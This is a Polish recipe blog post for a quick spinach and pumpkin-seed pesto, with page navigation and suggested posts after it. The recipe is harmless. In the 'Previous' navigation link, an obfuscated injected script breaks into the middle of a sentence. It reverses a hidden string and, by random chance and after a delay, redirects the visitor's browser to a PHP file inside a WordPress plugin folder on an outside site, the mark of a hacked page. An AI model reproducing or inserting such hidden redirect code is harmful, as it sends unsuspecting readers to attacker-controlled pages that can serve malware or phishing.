Pomysł na obiad: Smaczne pesto szpinakowe.


Nie dość, że danie szybkie, proste i smaczne, to przede wszystkim zdrowe i niskokaloryczne. Dodatkowo, można je modyfikować wedle własnych gustów i smaków. No i lista składników jest krótka 🙂

IMG_6691

Na pesto potrzebujemy:

– solidną garść świeżych liści szpinaku;

– 3-4 łyżki pestek dyni;

– 1-2 ząbków czosnku (jeśli używacie przeciskarki, to dajcie dwa ząbki, jeśli wolicie posiekać lub wrzucić do rozdrabniacza – wystarczy jeden);

– garść liści bazylii (opcjonalnie);

– 3 łyżki oleju (słonecznikowego lub rzepakowego);

– 3 łyżki soku z cytryny;

– szczyptę soli i pieprzu

Szpinak, bazylię, pestki i czosnek wrzucamy do rozdrabniacza, po kilka mniejszych porcji, żeby wszystko było równomiernie posiekane. Następnie do całości dodajemy sok z cytryny, olej, ew. czosnek, mieszamy oraz doprawiamy solą i pieprzem. Pesto gotowe.

IMG_6704

Najczęściej jemy pesto z pełnoziarnistym makaronem a całość świetnie pasuje do mięsa albo ryb.

 

Previous Nie ma <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to jak praktyczny prezent na Dzień Kobiet!
Next Matka Natura.

Suggested Posts

Nasze wakacyjne nowości książkowe, które pokochały dzieciaki.

Nasze wielkie mazurskie wakacje pod żaglami.

Tegoroczne wakacje będą … wyjątkowe!

Uświadom sobie tę jedną rzecz i żyj szczęśliwiej.

Dziękuję Ci, Mamo.

Na śniadanie.